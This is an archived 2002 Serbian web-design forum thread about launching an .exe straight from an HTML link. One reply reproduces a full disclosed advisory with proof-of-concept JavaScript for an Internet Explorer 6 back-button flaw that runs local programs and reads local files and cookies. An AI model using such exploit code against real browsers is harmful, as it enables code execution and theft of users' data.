Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Pokretanje exe programa direktno sa html-a???

[es] :: Web dizajn i CSS :: Pokretanje exe programa direktno sa html-a???
(Zaključana tema (lock), by pajaja)

[ Pregleda: 3451 | Odgovora: 5 ] > FB > Twit

Postavi temu

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Veljko
Beograd

Član broj: 967
Poruke: 1172
*.absolutok.com

Sajt: veljko.net


+1 Profil

icon Pokretanje exe programa direktno sa html-a???17.04.2002. u 21:33 - pre 234 meseci
Interesuje me da li je moguće postaviti link u html fajlu na neki exe fajl i da ga prilikom klika na link otvori bez pitanja Open or save file.
Ako nesto menjna stvar u pitanju je html fajl koji je u intranetu.
Znaci u lokalnoj mrezi.
Čini mi se da je neko pominjao da pistoji java script koji ovo odredjuje.

 
0

||NeX||
Nedim Šabić
Vlasnik SEO.ba
BiH

Član broj: 1430
Poruke: 1733
*.as53.tr.bih.net.ba.



+4 Profil

icon Re: Pokretanje exe programa direktno sa html-a???17.04.2002. u 22:17 - pre 234 meseci
Moguće je!
 
0

Veljko
Beograd

Član broj: 967
Poruke: 1172
*.absolutok.com

Sajt: veljko.net


+1 Profil

icon Re: Pokretanje exe programa direktno sa html-a???17.04.2002. u 22:48 - pre 234 meseci
ha ha
Dobro nisam lepo formulisao pitanje.
Pored toga sto me interesuje da li moze takodje me interesuje i kako.
Normalno ako zelis da mi objasnis (pomognes)
 
0

random
Vladimir Vrzić
Beograd

Član broj: 85
Poruke: 3866
194.106.163.*

Sajt: www.last.fm/user/vrza


+4 Profil

icon Re: Pokretanje exe programa direktno sa html-a???18.04.2002. u 00:58 - pre 234 meseci
Danas naiđoh na jedan exploit za IE, koji izvršava programe sa diska, možda pokupiš ideju odatle, ja nisam baš neki majstor za JavaScript.

Code:

<!--
---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Using the backbutton in IE is dangerous.
Date:       [2002-04-15]
Software:   At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating:     Medium because user interaction is needed.
Impact:     Read cookies/local files and execute code
            (triggered when user hits the back button).
Patch:      None.
Vendor:     Microsoft contacted 12 Nov 2001, additional
            information given 25 Mar 2002.
Workaround: Disable active scripting or never      _     _
            use the back button.                 o' ,=./ `o
Author:     Andreas Sandblad, [email protected]   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


DESCRIPTION:
============
IE allows urls containing the javascript protocoll in the history list.
Code injected in the url will operate in the same zone/domain as the last
url viewed. The javascript url can be set to trigger when a user presses
the backbutton.

The normal behaviour when a page fails to load is to press the backbutton.
The error page shown by IE is operating in the local computer zone
(res://C:WINNTSystem32shdoclc.dll/dnserror.htm# on Win2000). Thus, we
can execute code and read local files.


EXPLOIT:
========
The exploit works as follow: Press one of the links and then the back
button.

Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.
-->

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///d:/winnt/system32/winmine.exe')">
Run Minesweeper (d:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(""+payload+"")')";
  s+= ";history.back();} else '<script>location=""+url
  s+= "";document.title=""+page+"";<"+"/script>';";
  location = s;
}
</script>
</html>

<!--
Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Feedback:
=========
Please send suggestions and comments to:           _     _
[email protected]                              o' ,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
-->

int rand(void);

Those who do not understand Unix are condemned to reinvent it, poorly.

Upali lampicu — koristi Jabber!
 
0

]SnipeR[
Kosovo

Član broj: 3065
Poruke: 29
*.ptt.yu

ICQ: 126304617


Profil

icon Re: Pokretanje exe programa direktno sa html-a???16.05.2002. u 19:15 - pre 233 meseci
i sta ? pokrene .exe sa servera ? :PP looooood cod ;)
"Core dumping fsck's tend to make
me nervous"
 
0

Trunks
Stefan T.
Freelance web/grafički dizajner.
Novi Sad, Srbija

Član broj: 34
Poruke: 2465
*.28.EUnet.yu

ICQ: 28675801
Sajt: Linemotion.com


+1 Profil

icon Re: Pokretanje exe programa direktno sa html-a???16.05.2002. u 21:12 - pre 233 meseci
Koliko znam, ne postoji JavaScript koji će blokirati dijalog "Open or Save".
Probaj ovako: <a href="fajl.exe" target="_blank">Test</a>. Nemam drugih ideja.

A randomov kod ne čita exe sa servera, već sa diska - lokalne fajlove.
» Mom, mom, look what I did, mom!
» Look what I did to my hands, I broke 'em!
 
0

[es] :: Web dizajn i CSS :: Pokretanje exe programa direktno sa html-a???
(Zaključana tema (lock), by pajaja)

[ Pregleda: 3451 | Odgovora: 5 ] > FB > Twit

Postavi temu

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.